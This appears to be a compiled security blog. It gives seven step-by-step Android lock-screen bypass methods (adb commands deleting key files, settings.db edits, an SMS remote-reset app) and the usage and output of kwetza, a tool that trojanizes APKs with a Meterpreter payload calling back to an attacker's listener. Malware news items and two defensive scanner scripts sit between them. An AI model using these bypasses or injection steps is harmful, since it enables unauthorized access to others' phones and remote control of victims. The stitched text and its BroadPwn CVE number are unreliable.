
Bypass Android Pattern Lock

  


METHOD 1
Solution For Everyone With Recovery (CWM, TWRP, Xrec, etc.) Installed:
INSTRUCTIONS:
1. Download the Pattern Password Disable zip (download from attachments) onto your SD card
(using your PC, as you can't get into your phone, right?)
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 2
Solution For Everyone Without Recovery Installed – ADB:
What You Need:
=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed
How to install adb:
1. Open Terminal
2. Type:
sudo apt-get install android-tools-adb
-> Hit [Enter]
3. Follow the instructions until everything is installed.
INSTRUCTIONS:
1. Connect your (turned-on) phone to the computer via USB.
2. Open a terminal window.
3. Type:
adb devices
adb shell
cd data/system
su
rm *.key
4. Done.. Now You Just Have To Reboot.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 3
Solution For Everyone Before Lock Accident :
SMS Bypass – Download Link – Install It On Your Device (Download from attachments)
This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.
INSTRUCTIONS:
1. First, make sure you give permanent root access to the app.
2. Change the secret code to your preferred choice. The default password is: 1234
3. To reset your screen lock, send the following message from another phone:
secret_code reset
Example:
1234 reset
Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 4
Solution For Everyone Via Adb – SQL Command :
INSTRUCTIONS:
=>Type these commands separately in your terminal (CMD prompt):
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit
=>Now You Just Have To Reboot.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 5
Solution For Everyone Via Adb – File Removal :
INSTRUCTIONS:
=>Type This Command In Your Terminal (CMD Prompt) :
adb shell rm /data/system/gesture.key
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 6
Solution For Everyone With USB Debugging Enabled :
INSTRUCTIONS:
Primary steps for all methods:
Download & Extract to anywhere – Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside the By-pass security Hacks folder to pull the settings file out of your phone.
Drag settings.db and drop it onto the SQLite Database Browser 2.0.exe program.
Navigate to the Browse data tab. At Table, click to open the drop-down list and select secure.
Instruction To Remove Pattern Lock:
Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove PIN Lock:
Now, find or create lockscreen.password_type, double-click it and change its value to 65536. Apply changes!
Now, find lock_pattern_autolock and delete the record. If it doesn't exist, ignore this step.
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove Password Lock:
Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 7
Solution For Everyone With Recovery Installed :
INSTRUCTIONS:
1. Download and copy Aroma File manager.zip (download from attachments) to your memory card.
2. Open your recovery (press Volume Down + Power; this can differ between phones. Phones with a pressable button in the middle generally need all three buttons pressed. Google the combination for your phone; there are lots.)
3. There will be an option in recovery called “mount”. Go into that option and mount cache and everything else that is listed there.
4. Then select “update”, select “apply update from SD/external” and select the Aroma File manager.zip file that you downloaded using the QR code above.
5. After flashing or updating, Aroma File Manager will open. Use the volume keys for up/down and the power button to select, as you did to get into recovery.
6. In Aroma File Manager, go to Menu, which is located in the bottom strip, and then select Settings.
7. Go to the bottom and select “mount all partition in startup”, then exit Aroma File Manager.
8. After exiting, re-apply the Aroma update and it will open again.
9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock), then long-touch gesture.key or password.key and some options will be prompted; choose delete, delete that file and restart.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

Google Removes Around 500 Malicious Apps From Play Store



Cybersecurity company Lookout researched Android apps and found around 500 malicious apps on the Google Play Store. These apps are being used to spy on users.



Security research company Lookout said: The Lookout Security Intelligence team has discovered an advertising software development kit (SDK) called Igexin that had the capability of spying on victims through otherwise benign apps by downloading malicious plugins. Over 500 apps available on Google Play used the Igexin ad SDK. While not all of these applications have been confirmed to download the malicious spying capability, Igexin could have introduced that functionality at their convenience. Apps containing the affected SDK were downloaded over 100 million times across the Android ecosystem.

The company observed an app downloading large, encrypted files after making a series of initial requests to a REST API at http://sdk[.]open[.]phone[.]igexin[.]com/api.php, which is an endpoint used by the Igexin ad SDK.

This sort of traffic is often the result of malware that downloads and executes code after an initially "clean" app is installed, in order to evade detection. The encrypted file downloads and the presence of calls within the com.igexin namespace to Android's dalvik.system.DexClassLoader (used to load classes from a .jar or .apk file) were enough to warrant more in-depth analysis for possible malware hiding in its payload.

Not all versions of the Igexin ad SDK deliver malicious functionality. The malicious versions implement a plugin framework that allows the client to load arbitrary code, as directed by responses to requests made to a REST API endpoint hosted at http://sdk[.]open[.]phone[.]igexin[.]com/api.php.
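The static indicator described above, references to dalvik.system.DexClassLoader from inside one package namespace, can be checked on apktool-decoded smali. The following is an added example, not code from Lookout or from the original post; the smali sample and its class names are constructed for illustration.

```python
import re

# Smali type descriptor of the loader class named in the article.
DEX_LOADER = "Ldalvik/system/DexClassLoader;"
CLASS_RE = re.compile(r"^\.class\s+.*?(L[\w/$]+;)\s*$", re.M)
METHOD_RE = re.compile(r"^\.method\s+.*?([\w<>$]+)\(")


def find_dynamic_loading(smali_files, namespace="com.igexin"):
    """Return (class, method, line_no) for every DexClassLoader allocation or
    call made from a class whose package is inside `namespace`."""
    prefix = "L" + namespace.replace(".", "/") + "/"
    hits = []
    for path in sorted(smali_files):
        text = smali_files[path]
        decl = CLASS_RE.search(text)
        if not decl or not decl.group(1).startswith(prefix):
            continue  # class lives outside the namespace under review
        cls = decl.group(1)[1:-1].replace("/", ".")
        method = None
        for no, raw in enumerate(text.splitlines(), 1):
            line = raw.strip()
            start = METHOD_RE.match(line)
            if start:
                method = start.group(1)
            elif line == ".end method":
                method = None
            elif DEX_LOADER in line and line.startswith(("new-instance", "invoke-")):
                hits.append((cls, method, no))
    return hits


# Constructed smali (shape of apktool output); class names are made up.
SAMPLE = {
    "smali/com/igexin/demo/PluginLoader.smali": """\
.class public Lcom/igexin/demo/PluginLoader;
.super Ljava/lang/Object;

.method public static load(Ljava/lang/String;Ljava/lang/String;Ljava/lang/ClassLoader;)V
    .locals 2
    new-instance v0, Ldalvik/system/DexClassLoader;
    const/4 v1, 0x0
    invoke-direct {v0, p0, p1, v1, p2}, Ldalvik/system/DexClassLoader;-><init>(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/ClassLoader;)V
    return-void
.end method
""",
    "smali/com/example/app/Updater.smali": """\
.class public Lcom/example/app/Updater;
.super Ljava/lang/Object;

.method public run()V
    .locals 1
    new-instance v0, Ldalvik/system/DexClassLoader;
    return-void
.end method
""",
}

if __name__ == "__main__":
    for cls, method, no in find_dynamic_loading(SAMPLE):
        print(f"{cls}.{method} line {no}: DexClassLoader use")
```

A hit is a reason to look closer, as the article says, not proof of malice: dynamic class loading also has legitimate uses.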

By using this SDK, cybercriminals are developing malware to spy on mobile users and other devices by injecting malicious code into vulnerable apps.

As soon as Google learned about these malicious apps, it instantly removed them from the Play Store.

One major issue here was that users were not able to tell that they had become victims of this malvertising.

The company introduced Google Play Protect, which automatically scans an APK before users install it on their devices. Google keeps trying to keep malicious apps out of the Play Store. Hopefully the upcoming Android Oreo will offer more protection to its users.

New Android Malware GhostCtrl Can Take Full Control Of Your Phone




  • This malware infects Android devices and spreads via apps like WhatsApp, MMS and even Pokemon GO.
  • It steals call logs, SMS, contacts, location and other mobile activity.
  • It can access your phone camera or record audio.


Trend Micro security researchers warn of new Android malware called GhostCtrl, a variant of OmniRAT, which was found in 2015 and was known for remotely taking control of many operating systems, including Linux, Mac and Windows, with the touch of an Android device’s button.

How Does It Infect?

The APK forces the user to install the malicious app: when the user tries to cancel the installation, the APK keeps displaying the prompt. According to the report, when the app is launched, it base64-decodes a string from the resource file and writes it out; that decoded data is the actual malicious Android Application Package (APK).
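A scanner can look for the dropper behaviour described above by decoding long base64 runs in an app's resources and checking whether the result is a ZIP archive with APK members. This is an added example, not code from Trend Micro or the original post; the resource paths and the harmless placeholder archive are constructed here.

```python
import base64
import binascii
import io
import re
import zipfile

# A long run of base64 alphabet; short runs are ordinary resource strings.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")
ZIP_MAGIC = b"PK\x03\x04"  # an APK is a ZIP archive
APK_MEMBERS = {"AndroidManifest.xml", "classes.dex"}


def find_embedded_apks(resources):
    """resources maps a resource path to its raw bytes. Return a list of
    (path, offset, member_names) for each base64 run that decodes to a ZIP
    archive holding AndroidManifest.xml and classes.dex."""
    findings = []
    for path in sorted(resources):
        for m in B64_RUN.finditer(resources[path]):
            run = m.group(0)
            # Cheap pre-filter: 8 base64 chars decode to the first 6 bytes.
            if not base64.b64decode(run[:8]).startswith(ZIP_MAGIC):
                continue
            try:
                data = base64.b64decode(run, validate=True)
                names = sorted(zipfile.ZipFile(io.BytesIO(data)).namelist())
            except (binascii.Error, zipfile.BadZipFile):
                continue  # looked like a ZIP header but is not a whole archive
            if APK_MEMBERS.issubset(names):
                findings.append((path, m.start(), names))
    return findings


def constructed_sample():
    """Build harmless test resources: a placeholder archive, base64-encoded
    inside a string resource, next to two benign resources."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"placeholder, not real bytecode")
    blob = base64.b64encode(buf.getvalue())
    return {
        "res/values/strings.xml": b'<string name="blob">' + blob + b"</string>",
        "res/raw/padding.txt": b"A" * 80,
        "res/raw/notes.txt": b"plain text, nothing encoded here",
    }


if __name__ == "__main__":
    for path, offset, names in find_embedded_apks(constructed_sample()):
        print(f"{path} @ {offset}: base64-encoded archive with {names}")
```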

How To Protect?

  • Always Keep the device updated: Android patching is fragmented and organizations may have custom requirements or configurations needed to keep the device updated, so enterprises need to balance productivity and security
  • Apply the principle of least privilege—restrict user permissions for BYOD devices to prevent unauthorized access and installation of dubious apps
  • Implement an app reputation system that can detect and block malicious and suspicious apps
  • Deploy firewalls, intrusion detection, and prevention systems at both the endpoint and mobile device levels to preempt the malware’s malicious network activities
  • Enforce and strengthen your mobile device management policies to further reduce potential security risks
  • Employ encryption, network segmentation and data segregation to limit further exposure or damage to data
  • Regularly back up data in case of device loss, theft, or malicious encryption.

Millions of Android Devices Using Broadcom Wi-Fi Chip Can Be Hacked Remotely

Google has released its latest monthly security update for Android devices, including a fix for a serious bug in some Broadcom Wi-Fi chipsets that affects millions of Android devices, as well as some iPhone models.

Dubbed BroadPwn, the critical remote code execution vulnerability resides in Broadcom's BCM43xx family of WiFi chipsets. It can be triggered remotely without user interaction and allows a remote attacker to execute malicious code on targeted Android devices with kernel privileges.
"The most severe vulnerability in this [runtime] section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of an unprivileged process," Google describes in the July 2017 Android Security Bulletin.
The BroadPwn vulnerability (CVE-2017-3544) was discovered by Exodus Intelligence researcher Nitay Artenstein, who says the flawed Wi-Fi chipset also impacts Apple iOS devices.

Since Artenstein will be presenting his findings at the Black Hat 2017 event, details about the BroadPwn bug are scarce at this moment.
"The Broadcom BCM43xx family of Wi-Fi chips is found in an extraordinarily wide range of mobile devices – from various iPhone models to HTC, LG, Nexus and practically the full range of Samsung flagship devices," the abstract for Artenstein's talk says.
Besides the fix for the BroadPwn vulnerability, July's Android Security Bulletin includes patches for 10 critical vulnerabilities, which are all remote code execution bugs, plus 94 high and 32 moderate rated vulnerabilities.

Two months ago, an over-the-air hijacking vulnerability was discovered in Broadcom WiFi SoC (Software-on-Chip) chips, allowing attackers within the same WiFi network to remotely hack iPhones, iPads, iPods and Android handsets without any user interaction.


At that time, Apple rushed out an emergency iOS patch update to address the serious bug, and Google addressed the flaw in its Android April 2017 security updates.

Android Security Bulletin: July 2017 Updates


Among the other critical flaws is a long list of vulnerabilities in the Mediaserver process in the Android operating system, which also allows attackers to perform remote code execution on the affected devices.

One of the vulnerabilities is an issue with the way the framework handles some specific files. The libhevc library has an input validation vulnerability (CVE-2017-0540), which can be exploited using a crafted file.

"A remote code execution vulnerability in libhevc in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing," the vulnerability description says. 
"This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process."
The company has already issued over-the-air updates and firmware for its Pixel and Nexus devices, though the rest of the Android ecosystem still needs to wait for updates from OEMs, leaving millions of Android devices vulnerable for the next few months.

kwetza - To Inject Android Applications With A Meterpreter Payload


A Python script to inject existing Android applications with a Meterpreter payload.


What does it do?

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.


Getting the code

Firstly get the code:

git clone https://github.com/sensepost/kwetza.git

Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:

pip install beautifulsoup4

Kwetza requires Apktool to be installed and accessible via your PATH. This can be set up using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no


  • nameOfTheApkToInfect.apk = name of the APK you wish to infect.
  • LHOST = IP of your listener.
  • LPORT = Port of your listener.
  • yes = include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED


[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk


Information

Kwetza has been developed to work with Python 2.

Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.

If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.

The same can be done for payload templates.
The password for the default keystore is, well, "password".


Inspeckage - The Android Package Inspector For Dynamic Analysis With API Hooks



Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. 


Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.

Features

With Inspeckage, we can get a good amount of information about the application's behavior:

Information gathering

  • Requested Permissions;
  • App Permissions;
  • Shared Libraries;
  • Exported and Non-exported Activities, Content Providers, Broadcast Receivers and Services;
  • Check if the app is debuggable or not;
  • Version, UID and GIDs;
  • etc.

Hooks (so far)

With the hooks, we can see what the application is doing in real time:

  • Shared Preferences (log and file);
  • Serialization;
  • Crypto;
  • Hashes;
  • SQLite;
  • HTTP (an HTTP proxy tool is still the best alternative);
  • File System;
  • Miscellaneous (Clipboard, URL.Parse());
  • WebView;
  • IPC;
  • + Hooks (add new hooks dynamically)


Actions

With Xposed it's possible to perform actions such as starting an unexported activity and much else:

  • Start any activity (exported and unexported);
  • Call any provider (exported and unexported);
  • Disable FLAG_SECURE;
  • SSL uncheck (bypass certificate pinning - JSSE, Apache and okhttp3);
  • Start, stop and restart the application;

Extras

  • APK Download;
  • View the app's directory tree;
  • Download the app's files;
  • Download the output generated by hooks in text file format;
  • Take a screen capture;
  • Send text to android clipboard.


Configuration

Even though our tool has some hooks to the HTTP libraries, using an external proxy tool is still the best option to analyze the app's traffic. With Inspeckage, you can:

  • Add a proxy to the target app;
  • Enable and disable proxy;
  • Add entries in the arp table.


Logcat

Logcat.html page. An experimental page that uses a websocket to show some information from the logcat.


Installation

Requirements: Xposed Framework

Xposed Installer

  1. Go to Xposed Installer, select "Download"
  2. Refresh and search for "Inspeckage"
  3. Download the latest version and install
  4. Enable it in Xposed
  5. Reboot and enjoy!


Xposed Repository

Get it from Xposed repo: http://repo.xposed.info/module/mobi.acpm.inspeckage

 adb install mobi.acpm.inspeckage.apk

  • Enable it in Xposed
  • Reboot and enjoy!
  • Replace params and return value (+Hooks tab).

LazyDroid: Bash Script Tool For Android Application Assessment



Lazydroid is a tool written as a bash script to facilitate some aspects of an Android Assessment. 


It provides some common tasks such as:

  • Set the debug flag of an application to true
  • Set the backup flag of an application to true
  • Re-Build the application
  • Re-Sign the application
  • Smart log extraction of an application
  • Extract the APK of an application installed from Google Play
  • Download any mobile folder (/sdcard/, application data folder, other)
  • Compare two different snapshots of the same folder
  • Insert Frida gadget in the APK (for example when the phone is not or cannot be rooted, and thus Frida server cannot be run)

Installation

Lazydroid requires Linux or Mac OS to run, with the following tools installed:

  • apktool
  • jarsigner
  • adb
  • aapt (Android Asset Packaging Tool, part of the SDK)
  • your keystore and alias
  • Frida Agent (pip install frida)

To run lazydroid.sh the steps would be the following:

$ git clone
$ #configure the path to the tools (adb, jarsigner, apktool, etc and your favorite shell)
$ cd lazydroid
$ ./getfridalibs.sh #get the last frida libs for Android
$ ./lazydroid.sh


New Mobile Ransomware Alert Similar to WannaCry





Avast security researchers have detected new mobile ransomware, which they call "WannaLocker". It is spreading through Chinese gaming forums.


The mobile ransomware imitates a plugin for the popular Chinese game King of Glory, which is how victims are being tricked into downloading it.

Chinese hackers have developed a copycat version of the WannaCry ransomware to target Android users. This ransomware works similarly to WannaCry: it locks your mobile and asks you to pay a ransom.
Cybercriminals are spreading WannaLocker among Chinese Android users; it encrypts files on the infected device's external storage. After infecting the mobile device, WannaLocker hides its app icon and changes the home screen wallpaper to an anime image.

To unlock the device, it demands a ransom of 40 yuan (approx. $6), payable through Chinese payment methods like AliPay, QQ and WeChat.


How To Protect?


  • Protect your phone and the valuable photos, videos and contacts stored on it from ransomware.
  • Make sure you frequently back up your data and install antivirus on all of your devices.
  • Do not click unknown links.

Previously, WannaCry ransomware began affecting computers worldwide. It has become the biggest cyber threat worldwide.

Approximately 200,000 computers in 150 countries have been hit so far, including companies and the National Health Service. Some of the organisations didn't update their systems, which is why their systems were vulnerable to the ransomware attack.
